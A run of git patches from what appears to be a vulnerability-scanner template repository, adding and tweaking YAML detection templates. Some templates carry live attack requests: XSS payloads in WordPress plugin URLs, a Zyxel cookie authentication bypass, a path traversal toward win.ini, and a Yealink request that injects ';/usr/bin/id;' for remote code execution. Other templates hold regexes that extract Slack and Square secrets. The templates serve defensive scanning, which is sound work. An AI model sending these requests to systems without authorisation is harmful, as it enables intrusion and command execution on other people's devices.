- type: status + status: + - 200 From dfcd364059d5a2b35252a21fb48c0cc5ea366505 Mon Sep 17 00:00:00 2001 From: r3dg33k Date: Mon, 2 Aug 2021 01:08:39 -0400 Subject: [PATCH 1357/4083] update to CVE-2017-5487, added extractor --- cves/2017/CVE-2017-5487.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index 866847913c..95c8bd6956 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -33,3 +33,8 @@ requests: - '"name":' - '"avatar_urls":' condition: and + extractors: + - type: regex + part: body + regex: + - '"name":"[^"]*"' \ No newline at end of file From e896a8982de33002b8bd77b42ea9ad605d2e0ac9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 12:53:35 +0530 Subject: [PATCH 1358/4083] misc updates --- cves/2015/CVE-2015-2080.yaml | 2 +- cves/2018/CVE-2018-3810.yaml | 2 +- takeovers/wordpress-takeover.yaml | 1 - technologies/acontent-detect.yaml | 2 +- technologies/bigbluebutton-detect.yaml | 2 +- technologies/froxlor-detect.yaml | 2 +- technologies/node-red-detect.yaml | 2 +- technologies/sceditor-detect.yaml | 2 +- technologies/thinkcmf-detection.yaml | 2 +- technologies/wondercms-detect.yaml | 2 +- technologies/yapi-detect.yaml | 3 +-- vulnerabilities/other/spark-webui-unauth.yaml | 3 ++- 12 files changed, 12 insertions(+), 13 deletions(-) diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index 49fa9754af..80fdbce625 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -15,7 +15,7 @@ info: requests: - method: POST path: - - "{{BaseURL}}/" + - "{{BaseURL}}" headers: Referer: \x00 diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index dbf3bc07f4..84323e0f2a 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -18,7 +18,7 @@ requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index 4136ddbfef..536222d6ef 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -12,7 +12,6 @@ requests: path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: - type: word diff --git a/technologies/acontent-detect.yaml b/technologies/acontent-detect.yaml index 1224fffece..65bb5aebc2 100644 --- a/technologies/acontent-detect.yaml +++ b/technologies/acontent-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" redirects: true matchers-condition: and matchers: diff --git a/technologies/bigbluebutton-detect.yaml b/technologies/bigbluebutton-detect.yaml index bfe8188152..594f9a4800 100644 --- a/technologies/bigbluebutton-detect.yaml +++ b/technologies/bigbluebutton-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/froxlor-detect.yaml b/technologies/froxlor-detect.yaml index b3336641ef..a3d3a441ab 100644 --- a/technologies/froxlor-detect.yaml +++ b/technologies/froxlor-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml index 721bac1466..a0fd837d44 100644 --- a/technologies/node-red-detect.yaml +++ b/technologies/node-red-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/sceditor-detect.yaml b/technologies/sceditor-detect.yaml index 1ce4bcf978..d9b323edea 100644 --- a/technologies/sceditor-detect.yaml +++ b/technologies/sceditor-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/thinkcmf-detection.yaml b/technologies/thinkcmf-detection.yaml index 40557f30ff..6cc404174d 100644 --- a/technologies/thinkcmf-detection.yaml +++ b/technologies/thinkcmf-detection.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/wondercms-detect.yaml b/technologies/wondercms-detect.yaml index 9a84fa7999..b244d32945 100644 --- a/technologies/wondercms-detect.yaml +++ b/technologies/wondercms-detect.yaml @@ -9,7 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml index fb38ed2157..77facc8b00 100644 --- a/technologies/yapi-detect.yaml +++ b/technologies/yapi-detect.yaml @@ -9,8 +9,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" - - "{{BaseURL}}:3000" + - "{{BaseURL}}" matchers-condition: and matchers: diff --git a/vulnerabilities/other/spark-webui-unauth.yaml b/vulnerabilities/other/spark-webui-unauth.yaml index d22e414ee3..bd4e737908 100644 --- a/vulnerabilities/other/spark-webui-unauth.yaml +++ b/vulnerabilities/other/spark-webui-unauth.yaml @@ -9,7 +9,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" + matchers-condition: and matchers: - type: status From 0c7025f30d3040434a6cffeec80e13e4316efaa3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 12:55:51 +0530 Subject: [PATCH 1359/4083] Update CVE-2016-1000148.yaml --- cves/2016/CVE-2016-1000148.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml index cd8ee64bee..515c9bcf84 100644 --- a/cves/2016/CVE-2016-1000148.yaml +++ b/cves/2016/CVE-2016-1000148.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22" matchers-condition: and matchers: - type: word words: - - '"><"' + - '<"' part: body - type: word From 0757721d24394038d9e88f33bba01483bc5897ce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 12:56:49 +0530 Subject: [PATCH 1360/4083] Update CVE-2016-1000149.yaml --- cves/2016/CVE-2016-1000149.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml index 0669b0005b..b5e0487209 100644 --- a/cves/2016/CVE-2016-1000149.yaml +++ b/cves/2016/CVE-2016-1000149.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From bfa043e51fe4db4755ce9c6f9e8682dfb3be0ca1 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 2 Aug 2021 16:34:16 +0900 Subject: [PATCH 1361/4083] Create CVE-2021-3297.yaml On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-3297.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-3297.yaml diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml new file mode 100644 index 0000000000..3f679f533c --- /dev/null +++ b/cves/2021/CVE-2021-3297.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-3297 + +info: + name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass + description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. + author: gy741 + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 + - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass + tags: cve,cve2021,zyxel,auth-bypass + +requests: + - raw: + - | + GET /status.htm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + cookie: language=en; login=1 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Running Time" + - "Firmware Version" + - "Firmware Build Time" + condition: and + From 6f2d74337eadab23ac85dd1605b1bb7decd5f7b9 Mon Sep 17 00:00:00 2001 From: rootxharsh Date: Sun, 1 Aug 2021 23:54:52 +0530 Subject: [PATCH 1362/4083] Add CVE-2021-29484.yaml --- cves/2021/CVE-2021-29484.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-29484.yaml diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml new file mode 100644 index 0000000000..ecbb8b9ac4 --- /dev/null +++ b/cves/2021/CVE-2021-29484.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-29484 + +info: + name: DOM XSS in Ghost CMS + author: rootxharsh, iamnoooob + severity: medium + tags: ghost + reference: https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg + +requests: + - raw: + - | + GET /ghost/preview HTTP/1.1 + {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - 'XMLHttpRequest.prototype.open' + part: body + + - type: word + words: + - 'text/html' + part: header + + - type: status + status: + - 200 From ca0832e93e93d87a44cacd2955a7989fd470c927 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 2 Aug 2021 15:02:49 +0700 Subject: [PATCH 1363/4083] Create influxdb-detect.yaml --- technologies/influxdb-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/influxdb-detect.yaml diff --git a/technologies/influxdb-detect.yaml b/technologies/influxdb-detect.yaml new file mode 100644 index 0000000000..7a9538b3aa --- /dev/null +++ b/technologies/influxdb-detect.yaml @@ -0,0 +1,24 @@ +id: influxdb-detect + +info: + name: InfluxDB Detect + author: pikpikcu + severity: info + tags: tech,influxdb + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "InfluxDB - Admin Interface" + + - type: status + status: + - 200 From 813d424a492c6977df80c47feb7c81dc6beb049e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 14:32:39 +0530 Subject: [PATCH 1364/4083] Update oracle-bi-default-credentials.yaml --- default-logins/oracle/oracle-bi-default-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml index 1219ef549f..25da32202d 100644 --- a/default-logins/oracle/oracle-bi-default-credentials.yaml +++ b/default-logins/oracle/oracle-bi-default-credentials.yaml @@ -4,7 +4,7 @@ info: name: Oracle Business Intelligence Default Credentials author: milo2012 severity: high - tags: oracle,dlogin + tags: oracle,default-login requests: - raw: From 6950d325e613644cfad4cc2d4393873f498d8d2c Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 2 Aug 2021 12:55:21 +0300 Subject: [PATCH 1365/4083] Update description --- cves/2021/CVE-2021-29203.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 92cbe77690..d58b0ba9b8 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -4,6 +4,7 @@ info: author: madrobot severity: critical tags: hpe,cve,cve2021,bypass + description: A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager. reference: | - https://www.tenable.com/security/research/tra-2021-15 - https://nvd.nist.gov/vuln/detail/CVE-2021-29203 From 37608a954c0895e68d0cd317cbcfe34c92af9547 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 2 Aug 2021 12:56:17 +0300 Subject: [PATCH 1366/4083] Description --- cves/2021/CVE-2021-30497.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-30497.yaml b/cves/2021/CVE-2021-30497.yaml index e2a3ea14f8..0c94b9f41b 100644 --- a/cves/2021/CVE-2021-30497.yaml +++ b/cves/2021/CVE-2021-30497.yaml @@ -4,6 +4,7 @@ info: name: Ivanti Avalanche Directory Traversal author: gy741 severity: high + description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder reference: https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/ tags: cve,cve2021,avalanche,traversal From 3602a35c829cf2618758e7004450af6d2b5813fa Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 2 Aug 2021 17:04:43 +0700 Subject: [PATCH 1367/4083] Update square-access-token.yaml --- file/keys/square-access-token.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/file/keys/square-access-token.yaml b/file/keys/square-access-token.yaml index 5c328ad039..bc0d7c284e 100644 --- a/file/keys/square-access-token.yaml +++ b/file/keys/square-access-token.yaml @@ -1,7 +1,7 @@ id: square-access-token info: - name: Square Accesss Token + name: Square Access Token author: gaurang severity: high tags: token,file @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "sq0atp-[0-9A-Za-z\\-_]{22}" \ No newline at end of file + - "sq0atp-[0-9A-Za-z\\-_]{22}" From 89ce8da31cad1b93fb7e86954b01da741dbf2797 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 16:10:05 +0530 Subject: [PATCH 1368/4083] template update --- misconfiguration/zabbix-dashboards-access.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml index a1eee5e239..c3c1386d66 100644 --- a/misconfiguration/zabbix-dashboards-access.yaml +++ b/misconfiguration/zabbix-dashboards-access.yaml @@ -2,10 +2,12 @@ id: zabbix-dashboards-access info: name: zabbix-dashboards-access - author: pussycat0x + author: pussycat0x,vsh00t severity: medium description: View dashboard with guest login. - reference: https://www.exploit-db.com/ghdb/5595 + reference: | + - https://www.exploit-db.com/ghdb/5595 + - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt tags: zabbix,unauth requests: From 493acb8afecb43a84fac79dcbcf7232b8be59c10 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Mon, 2 Aug 2021 14:30:22 +0300 Subject: [PATCH 1369/4083] Description --- vulnerabilities/other/coldfusion-debug-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 240be6a9cd..2207ee9960 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -4,6 +4,7 @@ info: name: Adobe ColdFusion Debug Page XSS author: dhiyaneshDK severity: medium + description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml tags: adobe,coldfusion,xss From bae8422cfba9f8d317bf41797c3055e31e67cb80 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 17:06:07 +0530 Subject: [PATCH 1370/4083] Update CVE-2021-3297.yaml --- cves/2021/CVE-2021-3297.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 3f679f533c..1213153f4e 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -8,7 +8,7 @@ info: reference: | - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass - tags: cve,cve2021,zyxel,auth-bypass + tags: cve,cve2021,zyxel,auth-bypass,router requests: - raw: From 2c0ecb01b3a0735e6f5549be2e044e2974c50eaa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 17:09:52 +0530 Subject: [PATCH 1371/4083] Update CVE-2021-3297.yaml --- cves/2021/CVE-2021-3297.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 1213153f4e..756f4e4339 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -1,5 +1,4 @@ id: CVE-2021-3297 - info: name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. From 27f96f96c4d8a87ccc4212d269bfbe13648b99f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 17:12:42 +0530 Subject: [PATCH 1372/4083] Update CVE-2021-3297.yaml --- cves/2021/CVE-2021-3297.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index 756f4e4339..dd73110c6d 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -32,4 +32,3 @@ requests: - "Firmware Version" - "Firmware Build Time" condition: and - From 434b69608add8bd017309f89896fd0a820c04e4a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 17:16:58 +0530 Subject: [PATCH 1373/4083] Update CVE-2016-10993.yaml --- cves/2016/CVE-2016-10993.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml index ae90ffbd64..0b2a7df05e 100644 --- a/cves/2016/CVE-2016-10993.yaml +++ b/cves/2016/CVE-2016-10993.yaml @@ -7,18 +7,18 @@ info: reference: | - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - tags: cve,cve2016,wordpress,wp-plugin,xss + tags: cve,cve2016,wordpress,wp-theme,xss requests: - method: GET path: - - "{{BaseURL}}/?s=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E" + - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From c670df29258f6ea8fee38a6d9471230831a5cace Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 17:57:09 +0530 Subject: [PATCH 1374/4083] Update CVE-2021-21816.yaml --- cves/2021/CVE-2021-21816.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml index 5d25114756..e8df776430 100644 --- a/cves/2021/CVE-2021-21816.yaml +++ b/cves/2021/CVE-2021-21816.yaml @@ -6,7 +6,7 @@ info: author: gy741 severity: medium reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - tags: cve,cve2021,dlink,exposure + tags: cve,cve2021,dlink,exposure,router requests: - method: GET @@ -19,6 +19,7 @@ requests: words: - "syslog:" - "admin" + - "/etc_ro/lighttpd/www" part: body condition: and From 94bb9c825daf2ef5176b46e696d623a5729c51fe Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 2 Aug 2021 19:40:10 +0700 Subject: [PATCH 1375/4083] Fix regex slack webhook --- file/keys/slack-webhook.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/keys/slack-webhook.yaml b/file/keys/slack-webhook.yaml index 1e5fb65a52..0ed290829d 100644 --- a/file/keys/slack-webhook.yaml +++ b/file/keys/slack-webhook.yaml @@ -13,4 +13,4 @@ file: extractors: - type: regex regex: - - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{10}/B[0-9A-Za-z\\-_]{10}/[0-9A-Za-z\\-_]{23}" \ No newline at end of file + - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" From a1d73379aaee7ecd13ac2c988d7fad393e61f4e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 18:25:13 +0530 Subject: [PATCH 1376/4083] Added CVE-2021-27561 --- cves/2021/CVE-2021-27561.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-27561.yaml diff --git a/cves/2021/CVE-2021-27561.yaml b/cves/2021/CVE-2021-27561.yaml new file mode 100644 index 0000000000..ca860d8534 --- /dev/null +++ b/cves/2021/CVE-2021-27561.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-27561 + +info: + name: YeaLink DM PreAuth RCE + author: shifacyclewala,hackergautam + severity: critical + description: A malicious actor can trigger Unauthenticated Remote Code Execution + tags: cve,cve2021,rce,yealink + reference: https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ + +requests: + - method: GET + path: + - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - 'uid' + - 'gid' + - 'groups' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - "(u|g)id=.*" From b4eb7e05dcd610f2188fb91b0d95dfacd43cd9f8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 20:04:36 +0530 Subject: [PATCH 1377/4083] Added wordpress-gotmls-detect --- technologies/wordpress-gotmls-detect.yaml | 30 +++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 technologies/wordpress-gotmls-detect.yaml diff --git a/technologies/wordpress-gotmls-detect.yaml b/technologies/wordpress-gotmls-detect.yaml new file mode 100644 index 0000000000..210a1489d6 --- /dev/null +++ b/technologies/wordpress-gotmls-detect.yaml @@ -0,0 +1,30 @@ +id: wordpress-gotmls-detect + +info: + name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall + author: vsh00t + reference: https://www.exploit-db.com/exploits/50107 + severity: info + tags: wordpress,wp-plugin,gotmls + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: word + words: + - "gotmls" + part: header + + - type: status + status: + - 302 + + extractors: + - type: kval + part: header + kval: + - Location From 6b0f2fb9b7fad0f604d185fc01e69294569f704c Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 2 Aug 2021 20:06:23 +0530 Subject: [PATCH 1378/4083] Update wordpress-gotmls-detect.yaml --- technologies/wordpress-gotmls-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/wordpress-gotmls-detect.yaml b/technologies/wordpress-gotmls-detect.yaml index 210a1489d6..5abe70955b 100644 --- a/technologies/wordpress-gotmls-detect.yaml +++ b/technologies/wordpress-gotmls-detect.yaml @@ -21,10 +21,10 @@ requests: - type: status status: - - 302 + - 302 extractors: - type: kval part: header kval: - - Location + - Location From 3c713144d4b351d84d0d11b87ca157681ad35710 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 2 Aug 2021 10:17:06 -0500 Subject: [PATCH 1379/4083] Update general-tokens.yaml fix more fp --- exposures/tokens/generic/general-tokens.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 98bc651308..68ec941889 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -27,6 +27,7 @@ requests: regex: - '(?i)key(up|down|press|boardnavigation)' - '(?i)password(emailnotfoundmessage|label|errormessage|message)' + - '(?i)keys_(close|previous|next|zoom|play_pause)' condition: or negative: true From 451aca42f9d78ff134e04589faf5f837fd2b5f49 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 20:57:19 +0530 Subject: [PATCH 1380/4083] Update jenkins-script.yaml --- vulnerabilities/jenkins/jenkins-script.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml index 2e6b0f1256..2d2d073fe6 100644 --- a/vulnerabilities/jenkins/jenkins-script.yaml +++ b/vulnerabilities/jenkins/jenkins-script.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil severity: critical reference: https://hackerone.com/reports/403402 - tags: jenkins,rce + tags: jenkins,rce,devops requests: - method: GET path: @@ -15,6 +15,8 @@ requests: - type: word words: - "println(Jenkins.instance.pluginManager.plugins)" + - "Scriptconsole" + condition: and part: body - type: status status: From a7f26379b07c68fa3b24a601ff7bb8cb1865db1e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 21:20:22 +0530 Subject: [PATCH 1381/4083] Update dom-xss.yaml --- file/xss/dom-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index 52613af665..ed65126d4c 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -6,7 +6,7 @@ info: # The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report. author: geeknik severity: info - tags: dom,xss,file + tags: xss,file file: - extensions: From 1a84f0ed262f1091aaf8b457e4b3f09a5ab25380 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 21:44:34 +0530 Subject: [PATCH 1382/4083] Update tikiwiki-cms.yaml --- exposed-panels/tikiwiki-cms.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/tikiwiki-cms.yaml b/exposed-panels/tikiwiki-cms.yaml index 6430f470ab..b36fe00e20 100644 --- a/exposed-panels/tikiwiki-cms.yaml +++ b/exposed-panels/tikiwiki-cms.yaml @@ -4,7 +4,7 @@ info: name: Tiki Wiki CMS Groupware author: chron0x severity: info - tags: panel + tags: panel,tikiwiki requests: - method: GET From 03077a9ca204222c55b2d3a29cc5526787ff6576 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 21:44:48 +0530 Subject: [PATCH 1383/4083] Update tikiwiki-reflected-xss.yaml --- vulnerabilities/other/tikiwiki-reflected-xss.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/tikiwiki-reflected-xss.yaml b/vulnerabilities/other/tikiwiki-reflected-xss.yaml index 140cd8aa1b..6283ecd6fd 100644 --- a/vulnerabilities/other/tikiwiki-reflected-xss.yaml +++ b/vulnerabilities/other/tikiwiki-reflected-xss.yaml @@ -4,7 +4,7 @@ info: name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting author: madrobot severity: medium - tags: xss + tags: xss,tikiwiki requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header From 7d0e2be80a7513662cc6a51c721675f45ef5246b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 2 Aug 2021 21:47:19 +0530 Subject: [PATCH 1384/4083] Update CVE-2011-4336.yaml --- cves/2011/CVE-2011-4336.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index a6e4e66f47..8b0d597cec 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -1,7 +1,7 @@ id: CVE-2011-4336 info: - name: Tiki Wiki CMS Groupware 7.0 has XSS + name: Tiki Wiki CMS Groupware 7.0 has 